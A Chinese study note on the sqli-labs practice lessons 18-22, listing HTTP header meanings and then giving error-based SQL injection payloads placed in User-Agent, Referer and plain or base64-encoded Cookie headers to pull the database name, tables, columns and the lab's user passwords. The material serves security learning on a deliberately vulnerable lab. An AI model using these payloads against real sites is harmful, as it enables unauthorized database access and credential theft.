Sqli-labs 复习 Less18-22 HTTP 头注入 POST

之前学习了一遍 sqli-labs，这是巩固复习一遍，代码全部手敲，加深印象

Sqli-labs 博客目录

HTTP 头注入

HTTP 头部详解

1. Accept

   告诉WEB 服务器自己接受什么介质类型，/ 表示任何类型，type/* 表示该类型下的所有子类型，type/sub-type。

2. Accept-Charset

   浏览器申明自己接收的字符集

3. Accept-Encoding

   浏览器申明自己接收的编码方法，通常指定压缩方法，是否支持压缩，支持什么压缩方法（gzip，deflate）

4. Accept-Language

   览器申明自己接收的语言

   语言跟字符集的区别：中文是语言，中文有多种字符集，比如big5，gb2312，gbk 等等

5. Accept-Ranges

   WEB 服务器表明自己是否接受获取其某个实体的一部分（比如文件的一部分）的请求。bytes：表示接受，none：表示不接受。

6. Age

   当代理服务器用自己缓存的实体去响应请求时，用该头部表明该实体从产生到现在经过多长时间了

7. Authorization

   当客户端接收到来自WEB 服务器的WWW-Authenticate 响应时，用该头部来回应自己的身份验证信息给WEB 服务器。

8. Cache-Control

   请求：no-cache（不要缓存的实体，要求现在从WEB 服务器去取）

   1. max-age：（只接受Age 值小于max-age 值，并且没有过期的对象）
   2. max-stale：（可以接受过去的对象，但是过期时间必须小于max-stale 值）
   3. min-fresh：（接受其新鲜生命期大于其当前Age 跟min-fresh 值之和的缓存对象）
   4. 响应：public(可以用Cached 内容回应任何用户)
   5. private（只能用缓存内容回应先前请求该内容的那个用户）
   6. no-cache（可以缓存，但是只有在跟WEB 服务器验证了其有效后，才能返回给客户端）
   7. max-age：（本响应包含的对象的过期时间）
   8. ALL: no-store（不允许缓存）

9. Connection：请求

   close（告诉WEB 服务器或者代理服务器，在完成本次请求的响应后，断开连接，不要等待本次连接的后续请求了）。

   1. keepalive（告诉WEB 服务器或者代理服务器，在完成本次请求的响应后，保持连接，等待本次连接的后续请求）。
   2. 响应：close（连接已经关闭）。
   3. keepalive（连接保持着，在等待本次连接的后续请求）。
   4. Keep-Alive：如果浏览器请求保持连接，则该头部表明希望WEB 服务器保持连接多长时间（秒）。例如：Keep-Alive：300

10. Content-Encoding

    WEB 服务器表明自己使用了什么压缩方法（gzip，deflate）压缩响应中的对象。例如：Content-Encoding：gzip

11. Content-Language

    WEB 服务器告诉浏览器自己响应的对象的语言。

12. Content-Length

    WEB 服务器告诉浏览器自己响应的对象的长度。例如：Content-Length:26012

13. Content-Range

    WEB 服务器表明该响应包含的部分对象为整个对象的哪个部分。
    例如：Content-Range: bytes 21010-47021/47022

14. Content-Type

    WEB 服务器告诉浏览器自己响应的对象的类型。
    例如：Content-Type：application/xml

15. ETag

    就是一个对象（比如URL）的标志值，就一个对象而言，比如一个 html 文件，如果被修改了，其 Etag 也会别修改，所以 ETag 的作用跟Last-Modified 的作用差不多，主要供WEB 服务器判断一个对象是否改变了。比如前一次请求某个 html 文件时，获得了其 ETag，当这次又请求这个文件时，浏览器就会把先前获得的 ETag 值发送给 WEB 服务器，然后 WEB 服务器会把这个 ETag 跟该文件的当前 ETag 进行对比，然后就知道这个文件有没有改变了。

16. Expired

    WEB 服务器表明该实体将在什么时候过期，对于过期了的对象，只有在跟WEB 服务器验证了其有效性后，才能用来响应客户请求。是HTTP/1.0 的头部。
    例如：Expires：Sat, 23 May 2009 10:02:12 GMT

17. Host

    客户端指定自己想访问的WEB 服务器的域名/IP 地址和端口号。
    例如：Host：rss.sina.com.cn

18. If-Match

    如果对象的ETag 没有改变，其实也就意味著对象没有改变，才执行请求的动作。.

19. If-None-Match

    如果对象的ETag 改变了，其实也就意味著对象也改变了，才执行请求的动作。

20. If-Modified-Since

    如果请求的对象在该头部指定的时间之后修改了，才执行请求的动作（ 比如返回对象）， 否则返回代码304 ，告诉浏览器该对象没有修改。
    例如：If-Modified-Since：Thu, 10 Apr 2008 09:14:42 GMT

21. If-Unmodified-Since

    如果请求的对象在该头部指定的时间之后没修改过，才执行请求的动作（比如返回对象）。

22. If-Range

    浏览器告诉WEB 服务器，如果我请求的对象没有改变，就把我缺少的部分给我，如果对象改变了，就把整个对象给我。浏览器通过发送请求对象的ETag 或者自己所知道的最后修改时间给WEB 服务器，让其判断对象是否改变了。总是跟Range 头部一起使用。

23. Last-Modified

    WEB 服务器认为对象的最后修改时间，比如文件的最后修改时间，动态页面的最后产生时间等等。例如：Last-Modified：Tue, 06 May 2008 02:42:43 GMT22、Location：WEB 服务器告诉浏览器，试图访问的对象已经被移到别的位置了，到该头部指定的位置去取。
    例如： Location ： http://i0.sinaimg.cn/dy/deco/2008/0528/sinahome_0803_ws_005_text_0.gif

24. Pramga

    主要使用Pramga: no-cache，相当于Cache-Control： no-cache。
    例如：Pragma：no-cache

25. Proxy-Authenticate

    代理服务器响应浏览器，要求其提供代理身份验证信息。

26. Proxy-Authorization

    浏览器响应代理服务器的身份验证请求，提供自己的身份信息。

27. Range

    浏览器（比如Flashget 多线程下载时）告诉WEB 服务器自己想取对象的哪部分。
    例如：Range: bytes=1173546-

28. Referer

    浏览器向WEB 服务器表明自己是从哪个网页/URL 获得/点击当前请求中的网址/URL。例如：Referer：http://www.sina.com/

29. Server

    WEB 服务器表明自己是什么软件及版本等信息。
    例如：Server：Apache/2.0.61(Unix)

30. User-Agent

    浏览器表明自己的身份（是哪种浏览器）。
    例如：User-Agent：Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14

31. Transfer-Encoding

    WEB 服务器表明自己对本响应消息体（不是消息体里面的对象）作了怎样的编码，比如是否分块（chunked）。例如：Transfer-Encoding: chunked

32. Vary

    WEB 服务器用该头部的内容告诉Cache 服务器，在什么条件下才能用本响应所返回的对象响应后续的请求。假如源WEB 服务器在接到第一个请求消息时，其响应消息的头部为：Content- Encoding: gzip; Vary: Content-Encoding 那么Cache 服务器会分析后续请求消息的头部，检查其Accept-Encoding，是否跟先前响应的Vary 头部值一致，即是否使用相同的内容编码方法，这样就可以防止Cache 服务器用自己Cache 里面压缩后的实体响应给不具备解压能力的浏览器。例如：Vary：Accept-Encoding

33. Via

    列出从客户端到OCS 或者相反方向的响应经过了哪些代理服务器，他们用什么协议（和版本）发送的请求。当客户端请求到达第一个代理服务器时，该服务器会在自己发出的请求里面添加Via 头部，并填上自己的相关信息，当下一个代理服务器收到第一个代理服务器的请求时，会在自己发出的请求里面复制前一个代理服务器的请求的Via 头部，并把自己的相关信息加到后面，以此类推，当OCS 收到最后一个代理服务器的请求时，检查Via 头部，就知道该请求所经过的路由。例如：Via：1.0 236.D0707195.sina.com.cn:80(squid/2.6.STABLE13)

34. 推荐工具

    1. live http headers(firefox 插件)
    2. Tamper data(firefox 插件)

Less-18 User-Agent 域

1. 测试

   在 username 输入 admin

   在 password 输入 admin

   使用 burpsuite 抓包

   将 http 头改为 User-Agent: aaaaaaa（任意）

2. 猜数据库名

   User-Agent: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)) and ‘1’=’1

   User-Agent: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)),1,1)#

   结果为 security

3. 猜表名

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)),1,1)#

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1

   结果为 emails,referers,uagents,users

4. 猜列名

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)),1,1)#

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1

   结果为 id,username,password

5. 猜数据

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e)),1,1)#

   User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1

   结果为

   username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
   password: Dumb  Ikillyo     pssword crappy  stupidity   genious moble   admin   admin   admin 
   

Less-19 Referer 域

1. 测试

   在 username 输入 admin

   在 password 输入 admin

   使用 burpsuite 抓包

   将 http 头改为 Referer: aaaaaaa（任意）

2. 猜数据库

   Referer: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1

   Referer: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)),1)#

   结果为 security

3. 猜表名

   Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)),1)#

   Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1

   结果为 emails,referers,uagents,users

4. 猜列名

Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)),1)#

Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1

结果为 id,username,password

1. 猜数据

Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e)),1)#

Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1

结果为

    username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
    password: Dumb  Ikillyo     pssword crappy  stupidity   genious moble   admin   admin   admin 

Less-20 Cookie 注入

1. 测试

   在 username 输入 admin

   在 password 输入 admin

   使用 burpsuite 抓包

   添加一行 cookie值：

   Cookie: uname=admin1’and extractvalue(1,concat(0x7e,(select version()),0x7e))#

2. 猜数据库

   Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1

   Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database()),0x7e))#

   结果为 security

3. 猜表名

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e))#

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1

   结果为 emails,referers,uagents,users

4. 猜列名

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e))#

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1

   结果为 id,username,password

5. 猜数据

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e))#

   Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1

   结果为

   username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
   password: Dumb  Ikillyo     pssword crappy  stupidity   genious moble   admin   admin   admin 
   

Less-21 Cookie 注入 - base64 编码 - 单引号

1. 测试

   在 username 输入 admin

   在 password 输入 admin

   使用 burpsuite 抓包

   添加一行 cookie值：

   Cookie: uname=1’and extractvalue(1,concat(0x7e,(select version()),0x7e))and ‘1’=’1

   将 name 值进行 bas64 编码

   Cookie: uname=MSdhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB2ZXJzaW9uKCkpLDB4N2UpKWFuZCAnMSc9JzE=

2. 猜数据库

   Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1

   Cookie: uname=MSdhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpIGxpbWl0IDEsMSksMHg3ZSkpYW5kICcxJz0nMQ==

   结果为 security

Less-22 Cookie 注入 - base64 编码 - 双引号

1. 测试

   在 username 输入 admin

   在 password 输入 admin

   使用 burpsuite 抓包

   添加一行 cookie值：

   Cookie: uname=1”and extractvalue(1,concat(0x7e,(select version()),0x7e))and “1”=”1

   将 name 值进行 bas64 编码

   Cookie: uname=MSJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB2ZXJzaW9uKCkpLDB4N2UpKWFuZCAiMSI9IjE=

2. 猜数据库

   Cookie: uname=1”and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and “1”=”1

   Cookie: uname=MSJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpIGxpbWl0IDEsMSksMHg3ZSkpYW5kICIxIj0iMQ==

   结果为 security